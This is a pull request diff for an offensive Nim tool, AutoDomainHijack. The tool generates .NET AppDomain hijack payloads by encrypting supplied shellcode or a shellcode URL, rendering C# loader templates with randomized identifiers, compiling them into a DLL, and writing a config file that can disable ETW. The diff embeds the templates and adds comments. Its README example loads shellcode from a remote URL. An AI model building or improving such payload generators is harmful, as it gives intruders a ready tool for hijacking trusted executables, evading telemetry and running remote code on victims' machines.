### PR TITLE
Added embedding of mustache template files at compile-time

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,13 +1,16 @@
 # AutoAppDomainHijack
+
 Tools to automate finding AppDomain hijacks and generating payloads from shellcode.
 
 ## HijackHunt
-Run this tool on the target. It will search recursively in the `C:\` directory for .NET managed `.exe`s and test if the folder is writeable - indicating that the PE is AppDomainHijack-able.
+
+Run this tool on the target. It will search recursively in the `C:\` directory for .NET managed `.exe`s and test if the folder is writeable - indicating that the PE is [AppDomainHijack](https://attack.mitre.org/techniques/T1574/014/)-able.
 
 ## AutoDomainHijack
+
 Generate AppDomainHijack payloads given a shellcode file or url.
 
-```
+```CMD
 Usage:
   AutoDomainHijack.exe
   AutoDomainHijack.exe (--version | -h | --help)
@@ -19,9 +22,16 @@ Options:
   -f, --file=<file>                File containing the shellcode to embed.
   -o, --output=<output>            Full directory to write files to.
   -e, --etw=<etw>                  Disable ETW. [default: true]
-      --version                    Prints version
-  -h, --help                       Show help message
+      --version                    Prints version.
+  -h, --help                       Show help message.
+```
+
+### Example
+
+```CMD
+AutoDomainHijack.exe -t vulnerable_bin.exe -u https://domain.tld/shellcode.bin -n hijack.dll -o C:\path\to\output\the\hijack\dll\
 ```
 
 ## Build
+
 `nimble build`

--- a/src/AutoDomainHijack.nim
+++ b/src/AutoDomainHijack.nim
@@ -1,17 +1,42 @@
 #[
     Main binary for automation of AppDomain hijack payloads.
 ]#
-import std/[os, uri, strformat, osproc, strutils]
 
-import mustache
-import therapist
+# Importing necessary modules from the standard library and external libraries.
 
-import ./crypto
+import std/[os, uri, strformat, osproc, strutils, tables]  # os: for file and directory operations
+                                                           # uri: for URI handling
+                                                           # strformat: for string formatting
+                                                           # osproc: for executing OS processes
+                                                           # strutils: for string manipulation utilities
+                                                           # tables: for using hash tables (dictionaries)
+
+import mustache  # Importing the mustache library for templating
+import therapist # Importing the therapist library, used for command line parsing
+import ./crypto  # Importing a custom module named 'crypto' based on nimcrypto library for cryptographic operations
+
+# Defining constants pointing to template mustache files by performing compile-time reading of the content of mustache template files so mustache files are embedded in compiled executable
+
+const CONFIG = slurp("../templates/config.mustache")  # Loading configuration template from mustache file
+const HIJACKER_EMBEDDED_PIC = slurp("../templates/hijacker-embedded-pic.mustache")  # Loading hijacker embedded position indepent code template from a mustache file
+const HIJACKER_REMOTE_PIC = slurp("../templates/hijacker-remote-pic.mustache")  # Loading hijacker remote position indepent code template from a mustache file
+
+
+# Creating a hash table (dictionary) named 'partials' which maps template names to their corresponding content
+
+# This dictionary will facilitate the retrieval of template content using their respective keys
+
+let partials = {
+  "config": CONFIG,  # Adding the CONFIG template to the dictionary with the key "config"
+  "hijacker-embedded-pic": HIJACKER_EMBEDDED_PIC,  # Adding the hijacker embedded position independent code template with the key "hijacker-embedded-pic"
+  "hijacker-remote-pic": HIJACKER_REMOTE_PIC  # Adding the hijacker remote  position independent code template with the key "hijacker-remote-pic"
+}.toTable()  # Converting the dictionary to a table
+
 
 # The parser is specified as a tuple
 let spec = (
     # Name is a positional argument, by virtue of being surrounded by < and >
-    #name: newStringArg(@["<name>"], help="Person to greet"),
+    # name: newStringArg(@["<name>"], help="Person to greet"),
     target: newStringArg(@["-t", "--target-name"], required=true, help="Name of the target managed .exe to hijack."),
     hijackName: newStringArg(@["-n", "--hijack-name"], required=true, help="Name of the hijacker .dll."),
     shellcodeUrl: newStringArg(@["-u", "--url"], help="URL of the remote shellcode to run."),
@@ -19,17 +44,25 @@ let spec = (
     outputDirectory: newDirArg(@["-o", "--output"], required=true, help="Full directory to write files to."),
     disableEtw: newBoolArg(@["-e", "--etw"], defaultVal=true, help="Disable ETW."),
     # --version will cause 0.1.0 to be printed
-    version: newMessageArg(@["--version"], "1.0.0", help="Prints version"),
+    version: newMessageArg(@["--version"], "1.0.0", help="Prints version."),
     # --help will cause a help message to be printed
-    help: newHelpArg(@["-h", "--help"], help="Show help message"),
+    help: newHelpArg(@["-h", "--help"], help="Show help message."),
 )
 # `args` and `command` are included in tests but would normally be picked up from the commandline
 
+# This block of code will only execute if the current module is the main program being run,
+# rather than being imported as a library in another module.
+
 when isMainModule:
+    # This line calls the `parseOrQuit` procedure on the `spec` object.
+    # It is typically used to parse command-line arguments or configuration,
+    # and will terminate the program with a usage message if parsing fails or if
+    # help/version information is requested by the user.
     spec.parseOrQuit()
+
     # If a help message or version was requested or a parse error generated it would be printed
     # and then the parser would call `quit`. Getting past `parseOrQuit` implies we're ok.
-    # `spec` has now been modified to reflect the supplied arguments
+    # `spec` has now been modified to reflect the supplied arguments.
 
     # validate the target param contains an exe extension
     var (_, targetName, targetExt) = spec.target.value.splitFile()
@@ -41,52 +74,104 @@ when isMainModule:
     if hijackExt == "": hijackExt = "dll"
     let hijack = hijackName.addFileExt(hijackExt)
 
+    # Check if neither 'shellcodeFile' nor 'shellcodeUrl' options have been provided by the user.
     if not spec.shellcodeFile.seen and not spec.shellcodeUrl.seen:
+        # If both 'shellcodeFile' and 'shellcodeUrl' are missing, inform the user that one of them is required.
         echo "Shellcode file or url required!"
+        # Print an additional message indicating that the program will exit.
         echo "exiting..."
+        # Terminate the program because the required input was not provided.
         quit()
     
+    # Check if both 'shellcodeFile' and 'shellcodeUrl' options have been provided by the user.
     if spec.shellcodeFile.seen and spec.shellcodeUrl.seen:
+        # If both 'shellcodeFile' and 'shellcodeUrl' are specified, inform the user that only one should be provided.
         echo "Cannot specify both shellcode file and url, pick one!"
+        # Print an additional message indicating that the program will exit.
         echo "exiting..."
+        # Terminate the program because specifying both options is not allowed.
         quit()
 
+    # Check if the 'shellcodeFile' option has been provided by the user.
     if spec.shellcodeFile.seen:
-        # handle the embedded shellcode case here
+        # Handle the embedded shellcode case here.
+
+        # Check if the specified shellcode file exists.
         if not fileExists(spec.shellcodeFile.value):
-                echo "Shellcode file does not exist!"
-                echo "exiting..."
-                quit()
-        
-        try: # validate the uri 
-            discard spec.shellcodeUrl.value.parseUri()
-        except Exception as e:
-            echo e.msg
+            # If the file does not exist, inform the user.
+            echo "Shellcode file does not exist!"
+            # Print an additional message indicating that the program will exit.
+            echo "exiting..."
+            # Terminate the program because the specified shellcode file is not found.
             quit()
         
-        let key = crypto.randString(32)
-        let ivstring = crypto.randString(16)
-        let iv = cast[ptr array[16, byte]](addr ivstring[0])[]
+        # Attempt to validate the provided URI specified by the 'shellcodeUrl' option.
+        try:
+            # Parse the URI provided by the user.
+            # The `parseUri` function attempts to parse the URI string and returns a Uri object.
+            # The 'discard' keyword is used here to discard the result, as we are only interested in validating the URI format.
+            discard spec.shellcodeUrl.value.parseUri()
+
+        # If an exception occurs during URI parsing...
+        except Exception as e:
+            # Output the error message associated with the exception.
+            echo e.msg
+            # Exit the program because the URI provided is invalid.
+            quit()
         
-        # read and encrypte shellcode
+        # Generate a random string of 32 characters to be used as the encryption key.
+        let key = crypto.randString(32)
+
+        # Generate a random string of 16 characters to be used as the initialization vector (IV).
+        let ivstring = crypto.randString(16)
+
+        # Cast the address of the first byte of the IV string to a pointer to an array of 16 bytes.
+        # This is done to obtain a pointer to the memory location of the IV string, which will be used
+        # as the initialization vector in cryptographic operations.
+        let iv = cast[ptr array[16, byte]](addr ivstring[0])[]
+
+        # Open the shellcode file specified by the user for reading.
         let fShellcode = open(spec.shellcodeFile.value)
+
+        # Read the contents of the shellcode file into a sequence of bytes.
         let bShellcode = cast[seq[byte]](fShellcode.readAll())
+
+        # Encrypt the shellcode bytes using the provided encryption key and initialization vector (IV).
+        # The 'encryptBytes' method encrypts the bytes using the specified key and IV.
+        # The result is converted to a base64-encoded string using the 'encode' method.
         let encShellcode = bShellcode.encryptBytes(key, iv).encode()
+
+        # Close the shellcode file after reading and encryption.
         fShellcode.close()
         
-        # open config and hijack.cs file
+        # Open the configuration file for writing.
+        # The configuration file name is derived from the target name and has the ".config" extension.
         let fConfig = open(spec.outputDirectory.value / (target & ".config"), fmWrite)
-        let hijackFileName = hijackName & ".cs"
-        let fHijackCs = open(spec.outputDirectory.value / (hijackFileName), fmWrite)
 
-        # Begin template work
-        var c = newContext(searchDirs = @["templates"])
-        # Our vars
-        c["managerType"] = hijackName
-        c["encShellcode"] = encShellcode
-        c["key"] = key
-        c["ivstring"] = ivstring
-        # Randomized var, func, and class names
+        # Construct the filename for the hijack.cs file.
+        # The hijack.cs filename is derived from the hijackName with the ".cs" extension.
+        let hijackFileName = hijackName & ".cs"
+
+        # Open the hijack.cs file for writing.
+        let fHijackCs = open(spec.outputDirectory.value / hijackFileName, fmWrite)
+
+        # Create a new context for template processing.
+
+        var c = newContext()
+
+        # Search the 'partials' table (ln. 29) for template content that contains partial templates
+        # that will be used to render the final templates that maps template names to their corresponding content
+        # Searching the 'partials' table makes these partial templates available for use during template rendering.
+
+        c.searchTable(partials)
+
+        # Set variables in the context for template rendering.
+        c["managerType"] = hijackName     # Assign the value of 'hijackName' to the 'managerType' variable in the context.
+        c["encShellcode"] = encShellcode  # Assign the encrypted shellcode to the 'encShellcode' variable in the context.
+        c["key"] = key                    # Assign the encryption key to the 'key' variable in the context.
+        c["ivstring"] = ivstring          # Assign the IV string to the 'ivstring' variable in the context.
+
+        # Assign randomized values to variables, functions, and class names in the context
         c["class_Helper"] = randName()
         c["func_Run"] = randName()
         c["var_shellcodeString"] = randName()
@@ -115,65 +200,122 @@ when isMainModule:
 
 
 
+        # Write the rendered content of the "hijacker-embedded-pic" template to the hijack.cs file.
         fHijackCs.write("{{ >hijacker-embedded-pic }}".render(c))
+
+        # Close the hijack.cs file after writing.
         fHijackCs.close()
 
-        # Compile the CS
+
+        # Compile the C# source code into a DLL
+
+        # Define a variable to store the result of the compilation command
         var result: tuple[output: string, exitCode: int]
+
+        # Define the compilation command as a string ; Pending address reliability issue: If csc.exe does not exist in this path it won't compile
         let compileCmd = &"""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:{spec.outputDirectory.value / hijack} {spec.outputDirectory.value / hijackFileName}"""
+
+        # Execute the compilation command and store the result
         result = execCmdEx(compileCmd)
+
+        # Check if the compilation was successful (exit code 0)
         if result.exitCode != 0:
-            echo "Compiliation of hijacker CS failed!"
-            echo "command: ", compileCmd
-            echo "output:\n", result.output
-            echo "exiting..."
+            # If compilation failed, display error messages and exit
+            echo "Compilation of hijacker CS failed!"
+            echo "Command: ", compileCmd
+            echo "Output:\n", result.output
+            echo "Exiting..."
             quit()
         
-        # Get the full assembly name w/ version and signing key token (if any)
+        # Get the full assembly name with version and signing key token (if any)
+
+        # Define the PowerShell command to retrieve the full assembly name
         var pwshCmd = &"""powershell -c "$path = Join-Path (Get-Item {spec.outputDirectory.value}).Fullname '{hijack}';([system.reflection.assembly]::loadfile($path)).FullName" """
+
+        # Print the shell command being executed
         echo "Running shell command: ", pwshCmd
+
+        # Execute the PowerShell command and store the result
         result = execCmdEx(pwshCmd)
+
+        # Check if the PowerShell command was successful (exit code 0)
         if result.exitCode != 0:
+            # If the PowerShell command failed, display error messages and exit
             echo "Powershell to get the assembly name failed!"
-            echo "command: ", pwshCmd
-            echo "output:\n", result.output
-            echo "exiting..."
+            echo "Command: ", pwshCmd
+            echo "Output:\n", result.output
+            echo "Exiting..."
             quit()
 
-        # Write the config
-        c = newContext(searchDirs = @["templates"])
-        c["managerAssemblyFullName"] = result.output.replace("\n", "")
-        c["managerType"] = hijackName
-        if spec.disableEtw.value:
-            c["etwEnabled"] = "false"
-        else:
-            c["etwEnabled"] = "true"
+        # Write the configuration
 
+        # Create a new context for template rendering
+        c = newContext()
+
+        # Search the 'partials' table for template content
+        c.searchTable(partials)
+
+        # Set variables in the context for template rendering
+        c["managerAssemblyFullName"] = result.output.replace("\n", "")  # Set the full assembly name in the context
+        c["managerType"] = hijackName  # Set the manager type in the context
+
+        # Set 'etwEnabled' based on whether ETW is disabled or not
+        if spec.disableEtw.value:
+            c["etwEnabled"] = "false"  # If ETW is disabled, set 'etwEnabled' to "false"
+        else:
+            c["etwEnabled"] = "true"   # Otherwise, set 'etwEnabled' to "true"
+
+        # Render the configuration template and write it to the config file
         fConfig.write("{{ >config }}".render(c))
+
+        # Close the config file after writing
         fConfig.close()
 
-
+    # If the 'shellcodeUrl' option is provided:
     elif spec.shellcodeUrl.seen:
-        # handle remote url shellcode option
-        try: # validate the uri 
+        # Handle the remote URL shellcode option
+
+        # Try to validate the URI
+        try:
+            # Parse the URI provided by the user
+            # The `parseUri` function attempts to parse the URI string and returns a Uri object
+            # The 'discard' keyword is used here to discard the result, as we are only interested in validating the URI format
             discard spec.shellcodeUrl.value.parseUri()
+
+        # If an exception occurs during URI parsing...
         except Exception as e:
+            # Output the error message associated with the exception
             echo e.msg
+            # Exit the program because the URI provided is invalid
             quit()
         
-        # open config and hijack.cs file
+        # Open the configuration file for writing.
+        # The configuration file name is derived from the target name with a ".config" extension.
         let fConfig = open(spec.outputDirectory.value / (target & ".config"), fmWrite)
+
+        # Construct the filename for the hijack.cs file.
+        # The hijack.cs filename is derived from the hijackName with a ".cs" extension.
         let hijackFileName = hijackName & ".cs"
+
+        # Open the hijack.cs file for writing.
         let fHijackCs = open(spec.outputDirectory.value / (hijackFileName), fmWrite)
 
+        # Generate a random encryption key of length 32.
         let key = crypto.randString(32)
+
+        # Generate a random initialization vector (IV) string of length 16.
         let ivstring = crypto.randString(16)
+
+        # Cast the address of the first byte of the IV string to a pointer to an array of 16 bytes.
+        # This obtains a pointer to the memory location of the IV string, which will be used as the IV in cryptographic operations.
         let iv = cast[ptr array[16, byte]](addr ivstring[0])[]
-        
+
+        # Convert the shellcode URL to a byte sequence, encrypt it using the generated key and IV, and then encode it as a base64 string.
         let encUrl = toByteSeq(spec.shellcodeUrl.value).encryptBytes(key, iv).encode()
 
         # Begin template work
-        var c = newContext(searchDirs = @["templates"])
+        var c = newContext()
+        c.searchTable(partials)        
         # Our vars
         c["managerType"] = hijackName
         c["encUrl"] = encUrl
@@ -209,41 +351,80 @@ when isMainModule:
         c["class_StringEncryption"] = randName()
         c["class_NativeMethods"] = randName()
 
-
-
+        # Write the rendered content of the "hijacker-remote-pic" template to the hijack.cs file.
         fHijackCs.write("{{ >hijacker-remote-pic }}".render(c))
+
+        # Close the hijack.cs file after writing.
         fHijackCs.close()
 
-        # Compile the CS
+        # Compile the C#
+
+        # Define a variable to store the result of the compilation command
         var result: tuple[output: string, exitCode: int]
+
+        # Define the compilation command as a string
         let compileCmd = &"""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:{spec.outputDirectory.value / hijack} {spec.outputDirectory.value / hijackFileName}"""
+
+        # Execute the compilation command and store the result
         result = execCmdEx(compileCmd)
+
+        # Check if the compilation was successful (exit code 0)
         if result.exitCode != 0:
-            echo "Compiliation of hijacker CS failed!"
-            echo "command: ", compileCmd
-            echo "output:\n", result.output
-            echo "exiting..."
+            # If compilation failed, display error messages and exit
+            echo "Compilation of hijacker CS failed!"
+            echo "Command: ", compileCmd
+            echo "Output:\n", result.output
+            echo "Exiting..."
             quit()
-        
-        # Get the full assembly name w/ version and signing key token (if any)
+
+        # Output the compilation command and result
+        echo compileCmd
+        echo result
+
+        # Get the full assembly name with version and signing key token (if any)
+
+        # Define the PowerShell command to retrieve the full assembly name
         var pwshCmd = &"""powershell -c "$path = Join-Path (Get-Item {spec.outputDirectory.value}).Fullname '{hijack}';([system.reflection.assembly]::loadfile($path)).FullName" """
+
+        # Print the shell command being executed
         echo "Running shell command: ", pwshCmd
+
+        # Execute the PowerShell command and store the result
         result = execCmdEx(pwshCmd)
+
+        # Check if the PowerShell command was successful (exit code 0)
         if result.exitCode != 0:
+            # If the PowerShell command failed, display error messages and exit
             echo "Powershell to get the assembly name failed!"
-            echo "command: ", pwshCmd
-            echo "output:\n", result.output
-            echo "exiting..."
+            echo "Command: ", pwshCmd
+            echo "Output:\n", result.output
+            echo "Exiting..."
             quit()
 
-        # Write the config
-        c = newContext(searchDirs = @["templates"])
-        c["managerAssemblyFullName"] = result.output.replace("\n", "")
-        c["managerType"] = hijackName
-        if spec.disableEtw.value:
-            c["etwEnabled"] = "true"
-        else:
-            c["etwEnabled"] = "false"
+        # Output the PowerShell command and result
+        echo pwshCmd  # Print the PowerShell command that was executed
+        echo result   # Print the result of executing the PowerShell command
 
+        # Write the configuration
+
+        # Create a new context for template rendering
+        c = newContext()
+
+        # Search the 'partials' table for template content
+        c.searchTable(partials)
+
+        # Set variables in the context for template rendering
+        c["managerAssemblyFullName"] = result.output.replace("\n", "")  # Set the full assembly name in the context
+        c["managerType"] = hijackName                                   # Set the manager type in the context
+
+        # Set 'etwEnabled' based on whether ETW is disabled or not
+        if spec.disableEtw.value:
+            c["etwEnabled"] = "true"   # If ETW is disabled, set 'etwEnabled' to "true"
+        else:
+            c["etwEnabled"] = "false"  # Otherwise, set 'etwEnabled' to "false"
+
+        # Render the configuration template and write it to the config file
         fConfig.write("{{ >config }}".render(c))
+
+        # Close the config file after writing
         fConfig.close()

--- a/src/AutoDomainHijack.nim
+++ b/src/AutoDomainHijack.nim
@@ -1,5 +1,5 @@
 #[
-    Main binary for automation of AppDomain hijack payloads.
+    Main binary for automation of AppDomain hijack payloads. For insight on this technique, see: https://attack.mitre.org/techniques/T1574/014/
 ]#
 
 # Importing necessary modules from the standard library and external libraries.


### PR DESCRIPTION
Embedding the mustache template files to the resulting compiled nim binary eliminates the executable's need to exist in the directory where the user pulled the repository.

Added comments throughout the code explaining step by step what's happening on AutoDomainHijack.nim

Improved README file with usage example where the shellcode is served from a URL

Pending future updates: 

1. Validation of .NET and csc.exe binary existing in machine running the tool
2. Suggestion of which .NET version to download and from where if condition # 1 is not met